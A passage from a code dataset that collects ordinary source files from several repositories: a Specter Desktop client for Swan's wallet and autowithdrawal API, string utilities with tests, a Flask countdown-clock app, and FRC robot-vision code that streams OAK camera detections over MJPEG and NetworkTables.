"specter_wallet_alias": "seedsigner_demo"
},
"btcAddresses": []
}
}
"""
resp = self.authenticated_request(
endpoint=f"/apps/v20210824/wallets/{swan_wallet_id}?full=true",
method="GET",
)
return resp
def update_autowithdrawal_addresses(
self,
swan_wallet_id: str,
specter_wallet_name: str,
specter_wallet_alias: str,
addresses: List[str],
) -> dict:
"""
* If SWAN_WALLET_ID is known, any existing unused addresses are cleared.
* If there is no known SWAN_WALLET_ID, we `POST` to create an initial Swan wallet and store the resulting SWAN_WALLET_ID.
* Sends the list of new addresses for SWAN_WALLET_ID.
"""
# normalize the strucure compatible with what swan will accept:
# like: [{"address": "bcrt1q8k8a73crvjs06jhdj7xee8mace3mhlxj4pdvna"}, {"address": "bcrt ...
addresses = [address["address"] for address in addresses]
if swan_wallet_id:
# We already have a Swan walletId. DELETE the existing unused addresses...
self.delete_autowithdrawal_addresses(swan_wallet_id)
# ...and then append the new ones.
endpoint = f"/apps/v20210824/wallets/{swan_wallet_id}/addresses"
method = "PATCH"
else:
# We don't yet have a Swan walletId. POST to create one.
endpoint = "/apps/v20210824/wallets"
method = "POST"
resp = self.authenticated_request(
endpoint=endpoint,
method=method,
json_payload={
"btcAddresses": [{"address": addr} for addr in addresses],
"displayName": str(
_('Specter Desktop "{}"').format(specter_wallet_name)
), # Can't pass a LazyString into json
"metadata": {
"specter_wallet_alias": specter_wallet_alias,
},
},
)
"""
Response should include wallet ("item") details:
{
"entity": "wallet",
"item": {
"id": "c47e1e83-90a0-45da-ae25-6a0d324b9f29",
"isConfirmed": false,
"displayName": "Specter autowithdrawal to SeedSigner demo",
"metadata": {
"oidc": {
"clientId": "specter-dev"
},
"specter_wallet_alias": "seedsigner_demo"
}
}
}
"""
if "item" in resp and "id" in resp["item"]:
if resp["item"]["id"] != swan_wallet_id:
swan_wallet_id = resp["item"]["id"]
return swan_wallet_id
else:
raise SwanApiException(
f"No 'id' returned for the new/updated wallet: {json.dumps(resp, indent=4)}"
)
def delete_autowithdrawal_addresses(self, swan_wallet_id: str):
"""
Deletes all unused autowithdrawal addresses from the specified SWAN_WALLET_ID
"""
resp = self.authenticated_request(
endpoint=f"/apps/v20210824/wallets/{swan_wallet_id}/addresses",
method="DELETE",
)
return resp
def get_autowithdrawal_info(self) -> dict:
"""
See note in set_autowithdrawal. This returns all autowithdrawal objs from the Swan
side.
"""
resp = self.authenticated_request(
endpoint="/apps/v20210824/automatic-withdrawal",
method="GET",
)
return resp
def set_autowithdrawal(self, swan_wallet_id, btc_threshold: Decimal) -> dict:
"""
0 == Weekly; other float values = BTC threshold
The Swan api generates a new autowithdrawal id each time but there is no support to
update an existing autowithdrawal, other than activating or deactivating it.
New autowithdrawals are initialized as `isActive: false` and require the user to
complete a Swan-side email verification step.
We save the resulting autowithdrawal_id even though it isn't clear at the moment if
it's desirable to ever call the `deactivate/` or `activate/` endpoints.
"""
endpoint = "/apps/v20210824/automatic-withdrawal"
method = "POST"
resp = self.authenticated_request(
endpoint=endpoint,
method=method,
json_payload={
"walletId": swan_wallet_id,
"minBtcThreshold": btc_threshold,
},
)
"""
{
"entity": "automaticWithdrawal",
"item": {
"id": "******************",
"minBtcThreshold": "0.01",
"isActive": false,
"isCanceled": false,
"createdAt": "2022-01-07T02:14:56.070Z",
"walletId": "******************",
"walletAddressId": null
}
}
"""
if "item" in resp and "id" in resp["item"]:
return resp
else:
raise SwanApiException(
f"No 'id' returned for the new/updated autowithdrawal: {json.dumps(resp, indent=4)}"
)
def activate_autowithdrawal(self, autowithdrawal_id) -> dict:
"""
Activates the autowithdrawal specified in SwanService.AUTOWITHDRAWAL_ID.
If the automatic withdrawal was just created, this will generate a 400 error:
"Cannot activate an automatic withdrawal before withdrawal address is confirmed".
The user must first confirm the first withdrawal addr via Swan-side email flow.
After they confirm, the autowithdrawal should then return `isActive: true`.
NOT CURRENTLY USED; remove if we don't ever enable disable/activate flows.
"""
endpoint = f"/apps/v20210824/automatic-withdrawal/{autowithdrawal_id}/activate"
method = "POST"
resp = self.authenticated_request(
endpoint=endpoint,
method=method,
)
"""
{
"entity": "automaticWithdrawal",
"item": {
"id": "******************",
"minBtcThreshold": "0.01",
"isActive": true,
"isCanceled": false,
"createdAt": "2022-01-07T02:14:56.070Z",
"walletId": "******************",
"walletAddressId": null
}
}
"""
if "item" in resp and "id" in resp["item"]:
autowithdrawal_id = resp["item"]["id"]
return autowithdrawal_id
raise SwanApiException(
f"No 'id' returned for the new/updated autowithdrawal: {json.dumps(resp, indent=4)}"
)
def get_wallet_details(self, swan_wallet_id: str) -> dict:
"""
{
"entity": "wallet",
"item": {
"id": "********************",
"walletAddressId": ""********************",
"btcAddress": ""********************",
"isConfirmed": true,
"displayName": "Specter Desktop \"DCA Cold Storage\"",
"metadata": {
"oidc": {
"clientId": "specter-dev"
},
"specter_wallet_alias": "dca_cold_storage"
}
}
}
"""
resp = self.authenticated_request(
endpoint=f"/apps/v20210824/wallets/{swan_wallet_id}",
method="GET",
)
return resp
def get_wallets(self) -> dict:
"""
Return all Swan wallet entries. Should only be one per Specter-Swan user combo (but can be more due
to testing/debugging, calling `/wallets` POST more than once, etc.)
"""
resp = self.authenticated_request(
endpoint=f"/apps/v20210824/wallets",
method="GET",
)
"""
{
"entity": "wallet",
"list": [
{
"id": "**********",
"walletAddressId": "**********",
"btcAddress": "bc1q**********",
"isConfirmed": false,
"displayName": "Specter Desktop \"SeedSigner demo\"",
"metadata": {
"oidc": {
"clientId": "specter-dev"
},
"specter_wallet_alias": "seedsigner_demo"
}
},
{
"id": "**********",
"walletAddressId": "**********",
"btcAddress": "bc1q**********",
"isConfirmed": false,
"displayName": "Specter Desktop \"DCA Corn\"",
"metadata": {
"oidc": {
"clientId": "specter-dev"
},
"specter_wallet_alias": "dca_corn_2"
}
},
...,
]
}
"""
return resp
```
#### File: specter/util/common.py
```python
import re
def str2bool(my_str):
"""returns a reasonable boolean from a string so that "False" will result in False"""
if my_str is None:
return False
elif isinstance(my_str, str) and my_str.lower() == "false":
return False
elif isinstance(my_str, str) and my_str.lower() == "off":
return False
return bool(my_str)
def camelcase2snake_case(name):
"""If you pass DeviceManager it returns device_manager"""
pattern = re.compile(r"(?<!^)(?=[A-Z])")
name = pattern.sub("_", name).lower()
return name
def snake_case2camelcase(word):
return "".join(x.capitalize() or "_" for x in word.split("_"))
```
#### File: specter-desktop/tests/test_util_common.py
```python
from cryptoadvance.specter.util.common import (
camelcase2snake_case,
snake_case2camelcase,
str2bool,
)
def test_str2bool():
assert not str2bool(None)
assert str2bool("true")
assert str2bool("True")
assert str2bool("tRuE")
assert not str2bool("false")
assert not str2bool("False")
assert not str2bool("fAlsE")
assert str2bool("On")
assert str2bool("oN")
assert str2bool("ON")
assert not str2bool("Off")
assert not str2bool("oFF")
assert not str2bool("OFF")
def test_camelcase2snake_case():
assert camelcase2snake_case("Service") == "service"
assert camelcase2snake_case("DeviceType") == "device_type"
def test_snake_case2camelcase():
assert snake_case2camelcase("service") == "Service"
assert snake_case2camelcase("device_Type") == "DeviceType"
```
#### File: tretboot/tretboot/controller.py
```python
import logging
from flask import redirect, render_template, request, url_for, flash
from flask import current_app as app
from flask_login import login_required, current_user
from cryptoadvance.specter.services.controller import user_secret_decrypted_required
from cryptoadvance.specter.user import User
from cryptoadvance.specter.wallet import Wallet
from .service import TretbootService
logger = logging.getLogger(__name__)
tretboot_endpoint = TretbootService.blueprint
@tretboot_endpoint.route("/")
@login_required
@user_secret_decrypted_required
def index():
return render_template(
"tretboot/index.jinja",
)
@tretboot_endpoint.route("/settings", methods=["GET"])
@login_required
@user_secret_decrypted_required
def settings_get():
associated_wallet: Wallet = TretbootService.get_associated_wallet()
# Get the user's Wallet objs, sorted by Wallet.name
wallet_names = sorted(current_user.wallet_manager.wallets.keys())
wallets = [current_user.wallet_manager.wallets[name] for name in wallet_names]
return render_template(
"tretboot/settings.jinja",
associated_wallet=associated_wallet,
wallets=wallets,
cookies=request.cookies,
)
@tretboot_endpoint.route("/settings", methods=["POST"])
@login_required
@user_secret_decrypted_required
def settings_post():
show_menu = request.form["show_menu"]
user = app.specter.user_manager.get_user()
if show_menu == "yes":
user.add_service(TretbootService.id)
else:
user.remove_service(TretbootService.id)
used_wallet_alias = request.form.get("used_wallet")
if used_wallet_alias != None:
wallet = current_user.wallet_manager.get_by_alias(used_wallet_alias)
return redirect(url_for(f"{TretbootService.get_blueprint_name()}.settings_get"))
``` |
{
"source": "jonathancychow/countdown",
"score": 2
} |
#### File: countdown/countdown/app.py
```python
from flask import Flask, render_template, request, redirect, url_for
from countdown.flask_config import Config
import logging
from countdown.clock import ClockDriver, ClockMessage
from countdown.utils import get_clock_path
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
logging.basicConfig(format='%(asctime)s - %(message)s', level=logging.DEBUG)
app = Flask(__name__)
app.config.from_object(Config)
def start_up():
driver = ClockDriver.start_clock_chromium()
message_url = ClockMessage(show_current = 1).set_url()
logging.info(f"Starting up with url: {message_url}")
driver.get(message_url)
driver.fullscreen_window()
return driver
driver = start_up()
@app.route('/')
def index():
return render_template('index.html')
@app.route('/start_specific_time', methods=['POST'])
def start_specific_time():
start_time = request.form.get('starttime')
logging.info(f"Received Start Time: {start_time}")
message_url = ClockMessage(target_time = start_time).set_url()
logging.info(f"Start Counting Down")
driver.get(message_url)
driver.fullscreen_window()
return redirect(url_for('index'))
@app.route('/start_fixed_time', methods=['POST'])
def start_fixed_time():
start_time = request.form.get('fixtime')
logging.info(f"Received Start Time: {start_time}")
message_url = ClockMessage(fixed_time = start_time).set_url()
logging.info(f"Start Counting Down")
driver.get(message_url)
driver.fullscreen_window()
return redirect(url_for('index'))
@app.route('/send_message', methods=['POST'])
def send_message():
message = request.form['message']
logging.info("Received message : %s", message)
message_url = ClockMessage(message = message).set_url()
logging.info(f"Message sent to screen")
driver.get(message_url)
driver.fullscreen_window()
return redirect(url_for('index'))
@app.route('/show_current', methods=['POST'])
def show_current():
logging.info("Received request to display current time")
message_url = ClockMessage(show_current = 1).set_url()
logging.info(f"Message sent to screen")
driver.get(message_url)
driver.fullscreen_window()
return redirect(url_for('index'))
if __name__ == '__main__':
app.run()
``` |
{
"source": "jonathandao0/depthai-frc",
"score": 3
} |
#### File: depthai-frc/common/frame_conversion.py
```python
from common.field_constants import FIELD_HEIGHT, ROBOT_SIZE
def pose3d_to_frame2d(object_pose, scaled_values):
pose3d = object_pose.copy()
pose3d[1] = FIELD_HEIGHT - pose3d[1]
pose = list(int(l * r) for l, r in zip(scaled_values, object_pose[:2]))
# pose.append(object_pose[3])
return pose
def object_pose_to_robot_pose(object_pose, camera_transform):
robot_pose = object_pose
return robot_pose
def robot_pose_to_frame2d_points(robot_pos, scaled_values):
left = robot_pos[0] - (ROBOT_SIZE[1] / 2)
top = FIELD_HEIGHT - robot_pos[2] - (ROBOT_SIZE[0] / 2)
right = robot_pos[0] + (ROBOT_SIZE[1] / 2)
bottom = FIELD_HEIGHT - robot_pos[2] + (ROBOT_SIZE[0] / 2)
left_top = pose3d_to_frame2d([left, top, 0, robot_pos[2]], scaled_values)
right_bottom = pose3d_to_frame2d([right, bottom, 0, robot_pos[2]], scaled_values)
return left_top, right_bottom
def frame2d_to_field2d(cv2_pos):
return cv2_pos[1], cv2_pos[0], cv2_pos[2]
def pose3d_to_field2d(pose3d):
return pose3d[2], pose3d[0]
```
#### File: depthai-frc/common/mjpeg_stream.py
```python
import cv2
import logging
import threading
from PIL import Image
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
from time import sleep
import simplejpeg
log = logging.getLogger(__name__)
SERVER_IP = 'localhost'
COLORSPACE = 'BGR'
QUALITY = 20
# HTTPServer MJPEG
class VideoStreamHandler(BaseHTTPRequestHandler):
def do_GET(self):
global QUALITY
global COLORSPACE
self.send_response(200)
self.send_header('Content-type', 'multipart/x-mixed-replace; boundary=--jpgboundary')
self.end_headers()
while True:
try:
if hasattr(self.server, 'quality'):
QUALITY = self.server.quality
encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), QUALITY]
if hasattr(self.server, 'colorspace'):
COLORSPACE = self.server.colorspace
if hasattr(self.server, 'frame_to_send'):
# image = Image.fromarray(cv2.cvtColor(self.server.frametosend, cv2.COLOR_BGR2RGB))
# stream_file = BytesIO()
# image.save(stream_file, 'JPEG')
self.wfile.write("--jpgboundary".encode())
frame = cv2.resize(self.server.frame_to_send, (320, 320))
# frame = self.server.frame_to_send
if COLORSPACE == 'BW':
img_str = cv2.imencode('.jpg', frame, encode_param)[1].tostring()
else:
img_str = simplejpeg.encode_jpeg(frame, quality=QUALITY, colorspace=COLORSPACE, fastdct=True)
self.send_header('Content-type', 'image/jpeg')
# self.send_header('Content-length', str(stream_file.getbuffer().nbytes))
self.send_header('Content-length', len(img_str))
self.end_headers()
# image.save(self.wfile, 'JPEG')
self.wfile.write(img_str)
self.wfile.write(b"\r\n--jpgboundary\r\n")
sleep(0.03)
except Exception as e:
log.error("MJPEG Exception: {}".format(e))
self.flush_headers()
self.finish()
pass
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
pass
class MjpegStream:
def __init__(self, IP_ADDRESS=SERVER_IP, HTTP_PORT=8090, QUALITY=20, colorspace='BGR'):
# start MJPEG HTTP Server
log.info("MJPEG Stream starting at {}:{}".format(IP_ADDRESS, HTTP_PORT))
self.server_HTTP = ThreadedHTTPServer((IP_ADDRESS, HTTP_PORT), VideoStreamHandler)
cfg = {
'quality': QUALITY,
'colorspace': colorspace
}
self.set_config(cfg)
th = threading.Thread(target=self.server_HTTP.serve_forever)
th.daemon = True
th.start()
def set_config(self, config):
if 'quality' in config:
self.server_HTTP.quality = config['quality']
if 'colorspace' in config:
self.server_HTTP.colorspace = config['colorspace']
def send_frame(self, frame):
self.server_HTTP.frame_to_send = frame
```
#### File: depthai-frc/goal-depth-intake-detection-host/main.py
```python
import argparse
import operator
import threading
import numpy as np
from time import sleep
import cv2
import depthai as dai
import socket
from common.config import NN_IMG_SIZE
from common.cscore_stream import CsCoreStream
from pipelines import goal_edge_depth_detection, object_edge_detection
import logging
from common import target_finder
from common.mjpeg_stream import MjpegStream
from networktables.util import NetworkTables
from common.utils import FPSHandler
parser = argparse.ArgumentParser()
parser.add_argument('-d', dest='debug', action="store_true", default=False, help='Start in Debug Mode')
args = parser.parse_args()
log = logging.getLogger(__name__)
class Main:
def __init__(self):
log.info("Connected Devices:")
for device in dai.Device.getAllAvailableDevices():
log.info(f"{device.getMxId()} {device.state}")
self.init_networktables()
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip_address = s.getsockname()[0]
except:
ip_address = 'localhost'
port1 = 5801
port2 = 5802
self.device_list = {"OAK-D_Goal": {
'name': "OAK-D_Goal",
'id': "14442C1091398FD000",
# 'id': "14442C10218CCCD200",
'fps_handler': FPSHandler(),
'stream_address': "{}:{}".format(ip_address, port1),
'nt_tab': NetworkTables.getTable("OAK-D_Goal")
}, "OAK-1_Intake": {
'name': "OAK-1_Intake",
'id': "14442C1011043ED700",
# 'id': "14442C10C14F47D700",
'fps_handler': FPSHandler(),
'stream_address': "{}:{}".format(ip_address, port2),
'nt_tab': NetworkTables.getTable("OAK-1_Intake")
}}
self.goal_pipeline, self.goal_labels = goal_edge_depth_detection.create_pipeline("infiniteRecharge2021")
self.intake_pipeline, self.intake_labels = object_edge_detection.create_pipeline("infiniteRecharge2021")
self.oak_d_stream = MjpegStream(IP_ADDRESS=ip_address, HTTP_PORT=port1, colorspace='BW', QUALITY=10)
self.oak_1_stream = MjpegStream(IP_ADDRESS=ip_address, HTTP_PORT=port2, colorspace='BW', QUALITY=10)
# self.oak_d_stream = CsCoreStream(IP_ADDRESS=ip_address, HTTP_PORT=port1, colorspace='BW', QUALITY=10)
# self.oak_1_stream = CsCoreStream(IP_ADDRESS=ip_address, HTTP_PORT=port2, colorspace='BW', QUALITY=10)
def parse_goal_frame(self, frame, edgeFrame, bboxes):
kernel = np.ones((3, 3), np.uint8)
edgeFrame = cv2.morphologyEx(edgeFrame, cv2.MORPH_CLOSE, kernel, iterations=1)
# edgeFrame = cv2.threshold(edgeFrame, 20, 255, cv2.THRESH_TOZERO)[1]
valid_labels = ['red_upper_power_port', 'blue_upper_power_port']
nt_tab = self.device_list['OAK-D_Goal']['nt_tab']
if len(bboxes) == 0:
nt_tab.putString("target_label", "None")
nt_tab.putNumber("tv", 0)
else:
for bbox in bboxes:
target_label = self.goal_labels[bbox['label']]
if target_label not in valid_labels:
continue
edgeFrame, target_x, target_y = target_finder.find_largest_hexagon_contour(edgeFrame, bbox)
if target_x == -999 or target_y == -999:
log.error("Error: Could not find target contour")
continue
angle_offset = (target_x - (NN_IMG_SIZE / 2.0)) * 68.7938003540039 / 1920
if abs(angle_offset) > 30:
log.info("Invalid angle offset. Setting it to 0")
nt_tab.putNumber("tv", 0)
angle_offset = 0
else:
log.info("Found target '{}'\tX Angle Offset: {}".format(target_label, angle_offset))
nt_tab.putNumber("tv", 1)
nt_tab.putString("target_label", target_label)
nt_tab.putNumber("tx", angle_offset)
nt_tab.putNumber("tz", bbox['depth_z'])
cv2.rectangle(edgeFrame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']),
(255, 255, 255), 2)
cv2.circle(edgeFrame, (int(round(target_x, 0)), int(round(target_y, 0))), radius=5, color=(128, 128, 128),
thickness=-1)
bbox['target_x'] = target_x
bbox['target_y'] = target_y
bbox['angle_offset'] = angle_offset
fps = self.device_list['OAK-D_Goal']['fps_handler']
fps.next_iter()
cv2.putText(edgeFrame, "{:.2f}".format(fps.fps()), (0, 20), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
self.oak_d_stream.send_frame(edgeFrame)
return frame, edgeFrame, bboxes
def parse_intake_frame(self, frame, edgeFrame, bboxes):
edgeFrame = cv2.threshold(edgeFrame, 60, 255, cv2.THRESH_TOZERO)[1]
valid_labels = ['power_cell']
nt_tab = self.device_list['OAK-1_Intake']['nt_tab']
filtered_bboxes = []
for bbox in bboxes:
if self.intake_labels[bbox['label']] in valid_labels:
filtered_bboxes.append(bbox)
filtered_bboxes.sort(key=operator.itemgetter('size'), reverse=True)
if len(filtered_bboxes) == 0:
nt_tab.putNumber("tv", 0)
nt_tab.putNumberArray("ta", [0])
else:
nt_tab.putNumber("tv", 1)
target_angles = []
for bbox in filtered_bboxes:
angle_offset = (bbox['x_mid'] - (NN_IMG_SIZE / 2.0)) * 68.7938003540039 / 1920
cv2.rectangle(edgeFrame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']), (255, 255, 255), 2)
target_angles.append(angle_offset)
bbox['angle_offset'] = angle_offset
nt_tab.putNumberArray("ta", target_angles)
fps = self.device_list['OAK-1_Intake']['fps_handler']
fps.next_iter()
cv2.putText(edgeFrame, "{:.2f}".format(fps.fps()), (0, 20), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
self.oak_1_stream.send_frame(edgeFrame)
return frame, edgeFrame, filtered_bboxes
def init_networktables(self):
NetworkTables.startClientTeam(4201)
if not NetworkTables.isConnected():
log.info("Could not connect to team client. Trying other addresses...")
NetworkTables.startClient([
'10.42.1.2',
'127.0.0.1',
'10.0.0.2',
'192.168.100.108'
])
if NetworkTables.isConnected():
log.info("NT Connected to {}".format(NetworkTables.getRemoteAddress()))
return True
else:
log.error("Could not connect to NetworkTables. Restarting server...")
return False
def run(self):
log.info("Setup complete, parsing frames...")
threadlist = []
try:
found_1, device_info_1 = dai.Device.getDeviceByMxId(self.device_list['OAK-D_Goal']['id'])
self.device_list['OAK-D_Goal']['nt_tab'].putBoolean("OAK-D_Goal Status", found_1)
if found_1:
th1 = threading.Thread(target=self.run_goal_detection, args=(device_info_1,))
th1.start()
threadlist.append(th1)
found_2, device_info_2 = dai.Device.getDeviceByMxId(self.device_list['OAK-1_Intake']['id'])
self.device_list['OAK-1_Intake']['nt_tab'].putBoolean("OAK-1_Intake Status", found_2)
if found_2:
th2 = threading.Thread(target=self.run_intake_detection, args=(device_info_2,))
th2.start()
threadlist.append(th2)
while True:
for t in threadlist:
if not t.is_alive():
break
sleep(10)
finally:
log.info("Exiting Program...")
def run_goal_detection(self, device_info):
self.device_list['OAK-D_Goal']['nt_tab'].putString("OAK-D_Goal Stream", self.device_list['OAK-D_Goal']['stream_address'])
for frame, edgeFrame, bboxes in goal_edge_depth_detection.capture(device_info):
self.parse_goal_frame(frame, edgeFrame, bboxes)
def run_intake_detection(self, device_info):
self.device_list['OAK-1_Intake']['nt_tab'].putString("OAK-1 Stream", self.device_list['OAK-1_Intake']['stream_address'])
for frame, edgeFrame, bboxes in object_edge_detection.capture(device_info):
self.parse_intake_frame(frame, edgeFrame, bboxes)
class MainDebug(Main):
def __init__(self):
super().__init__()
def parse_goal_frame(self, frame, edgeFrame, bboxes):
frame, edgeFrame, bboxes = super().parse_goal_frame(frame, edgeFrame, bboxes)
valid_labels = ['red_upper_power_port', 'blue_upper_power_port']
for bbox in bboxes:
target_label = self.goal_labels[bbox['label']]
if target_label not in valid_labels:
continue
target_x = bbox['target_x'] if 'target_x' in bbox else 0
angle_offset = bbox['angle_offset'] if 'angle_offset' in bbox else 0
cv2.putText(edgeFrame, "x: {}".format(round(target_x, 2)), (bbox['x_min'], bbox['y_min'] + 30),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(edgeFrame, "y: {}".format(round(bbox['y_mid'], 2)), (bbox['x_min'], bbox['y_min'] + 50),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(edgeFrame, "z: {}".format(round(bbox['depth_z'], 2)), (bbox['x_min'], bbox['y_min'] + 70),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(edgeFrame, "angle: {}".format(round(angle_offset, 3)), (bbox['x_min'], bbox['y_min'] + 90),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(edgeFrame, "conf: {}".format(round(bbox['confidence'], 2)), (bbox['x_min'], bbox['y_min'] + 110),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(edgeFrame, "label: {}".format(self.goal_labels[bbox['label']], 1), (bbox['x_min'], bbox['y_min'] + 130),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.imshow("OAK-D Goal Edge", edgeFrame)
cv2.imshow("OAK-D Goal ", frame)
key = cv2.waitKey(1)
if key == ord("q"):
raise StopIteration()
def parse_intake_frame(self, frame, edgeFrame, bboxes):
frame, edgeFrame, bboxes = super().parse_intake_frame(frame, edgeFrame, bboxes)
for i, bbox in enumerate(bboxes):
angle_offset = bbox['angle_offset'] if 'angle_offset' in bbox else 0
frame_color = (0, 255, 0) if i == 0 else (0, 150, 150)
cv2.rectangle(frame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']), frame_color, 2)
cv2.putText(frame, "x: {}".format(round(bbox['x_mid'], 2)), (bbox['x_min'], bbox['y_min'] + 30),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "y: {}".format(round(bbox['y_mid'], 2)), (bbox['x_min'], bbox['y_min'] + 50),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "angle: {}".format(round(angle_offset, 3)), (bbox['x_min'], bbox['y_min'] + 70),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "size: {}".format(round(bbox['size'], 3)), (bbox['x_min'], bbox['y_min'] + 90),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "conf: {}".format(round(bbox['confidence'], 2)), (bbox['x_min'], bbox['y_min'] + 110),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.imshow("OAK-1 Intake Edge", edgeFrame)
cv2.imshow("OAK-1 Intake", frame)
key = cv2.waitKey(1)
if key == ord("q"):
raise StopIteration()
if __name__ == '__main__':
log.info("Starting goal-depth-detection-host")
if args.debug:
MainDebug().run()
else:
Main().run()
```
#### File: depthai-frc/intake-detection-host/main.py
```python
import argparse
import operator
import threading
from time import sleep
import cv2
import depthai as dai
import socket
from common import target_finder
from common.config import NN_IMG_SIZE
from pipelines import object_detection, object_tracker_detection, object_edge_detection
import logging
from common.mjpeg_stream import MjpegStream
from networktables.util import NetworkTables
from common.utils import FPSHandler
parser = argparse.ArgumentParser()
parser.add_argument('-d', dest='debug', action="store_true", default=False, help='Start in Debug Mode')
args = parser.parse_args()
log = logging.getLogger(__name__)
class Main:
power_cell_counter = 0
def __init__(self):
log.info("Connected Devices:")
for device in dai.Device.getAllAvailableDevices():
log.info(f"{device.getMxId()} {device.state}")
self.init_networktables()
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip_address = s.getsockname()[0]
except:
ip_address = 'localhost'
port1 = 5801
port2 = 5802
self.device_list = {"OAK-1": {
'name': "OAK-1",
'id': "14442C10218CCCD200",
# 'id': "14442C1011043ED700",
'fps_handler': FPSHandler(),
'stream_address': "{}:{}".format(ip_address, port1),
'nt_tab': NetworkTables.getTable("OAK-1_Intake")
}, "OAK-2": {
'name': "OAK-2",
# 'id': "14442C10C14F47D700",
'id': "14442C10C14F47D700",
'fps_handler': FPSHandler(),
'stream_address': "{}:{}".format(ip_address, port2),
'nt_tab': NetworkTables.getTable("OAK-2_Indexer")
}}
self.intake_pipeline, self.intake_labels = object_edge_detection.create_pipeline("infiniteRecharge2021")
self.object_pipeline, self.object_labels = object_tracker_detection.create_pipeline("infiniteRecharge2021")
self.oak_1_stream = MjpegStream(IP_ADDRESS=ip_address, HTTP_PORT=port1)
self.oak_2_stream = MjpegStream(IP_ADDRESS=ip_address, HTTP_PORT=port2)
def parse_intake_frame(self, frame, edgeFrame, bboxes):
valid_labels = ['power_cell']
nt_tab = self.device_list['OAK-1']['nt_tab']
filtered_bboxes = []
for bbox in bboxes:
if self.intake_labels[bbox['label']] in valid_labels:
filtered_bboxes.append(bbox)
filtered_bboxes.sort(key=operator.itemgetter('size'), reverse=True)
if len(filtered_bboxes) == 0:
nt_tab.putNumber("tv", 0)
else:
nt_tab.putNumber("tv", 1)
target_angles = []
for bbox in filtered_bboxes:
angle_offset = (bbox['x_mid'] - (NN_IMG_SIZE / 2.0)) * 68.7938003540039 / 1920
cv2.rectangle(edgeFrame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']), (255, 255, 255), 2)
target_angles.append(angle_offset)
bbox['angle_offset'] = angle_offset
nt_tab.putNumberArray("ta", target_angles)
fps = self.device_list['OAK-1']['fps_handler']
fps.next_iter()
cv2.putText(edgeFrame, "{:.2f}".format(fps.fps()), (0, 20), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(edgeFrame, "{}".format(self.power_cell_counter), (0, NN_IMG_SIZE - 20), cv2.FONT_HERSHEY_TRIPLEX, 2, (0, 255, 0))
self.oak_1_stream.send_frame(edgeFrame)
return frame, edgeFrame, filtered_bboxes
def parse_object_frame(self, frame, bboxes):
valid_labels = ['power_cell']
nt_tab = self.device_list['OAK-2']['nt_tab']
self.power_cell_counter = 0
for bbox in bboxes:
target_label = self.object_labels[bbox['label']]
if target_label not in valid_labels:
continue
self.power_cell_counter += 1
box_color = (0, 150, 150)
if self.power_cell_counter >= 5:
box_color = (0, 255, 0)
elif self.power_cell_counter < 3:
box_color = (0, 0, 255)
for bbox in bboxes:
cv2.rectangle(frame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']), box_color, 2)
nt_tab.putNumber("powercells", self.power_cell_counter)
nt_tab.putBoolean("indexer_full", self.power_cell_counter >= 5)
width = int(frame.shape[1] * 60 / 100)
height = int(frame.shape[0] * 60 / 100)
frame = cv2.resize(frame, (width, height), interpolation=cv2.INTER_LINEAR)
fps = self.device_list['OAK-2']['fps_handler']
fps.next_iter()
cv2.putText(frame, "{:.2f}".format(fps.fps()), (0, 20), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
self.oak_2_stream.send_frame(frame)
return frame, bboxes
def init_networktables(self):
NetworkTables.startClientTeam(4201)
if not NetworkTables.isConnected():
log.info("Could not connect to team client. Trying other addresses...")
NetworkTables.startClient([
'10.42.1.2',
'127.0.0.1',
'10.0.0.2',
'192.168.100.108'
])
if NetworkTables.isConnected():
log.info("NT Connected to {}".format(NetworkTables.getRemoteAddress()))
return True
else:
log.error("Could not connect to NetworkTables. Restarting server...")
return False
def run(self):
log.info("Setup complete, parsing frames...")
threadlist = []
try:
found_1, device_info_1 = dai.Device.getDeviceByMxId(self.device_list['OAK-1']['id'])
self.device_list['OAK-1']['nt_tab'].putBoolean("OAK-1 Status", found_1)
if found_1:
th1 = threading.Thread(target=self.run_intake_detection, args=(device_info_1,))
th1.start()
threadlist.append(th1)
found_2, device_info_2 = dai.Device.getDeviceByMxId(self.device_list['OAK-2']['id'])
self.device_list['OAK-2']['nt_tab'].putBoolean("OAK-2 Status", found_2)
if found_2:
th2 = threading.Thread(target=self.run_object_detection, args=(device_info_2,))
th2.start()
threadlist.append(th2)
while True:
for t in threadlist:
if not t.is_alive():
break
sleep(10)
finally:
log.info("Exiting Program...")
def run_intake_detection(self, device_info):
self.device_list['OAK-1']['nt_tab'].putString("OAK-1 Stream", self.device_list['OAK-1']['stream_address'])
for frame, edgeFrame, bboxes in object_edge_detection.capture(device_info):
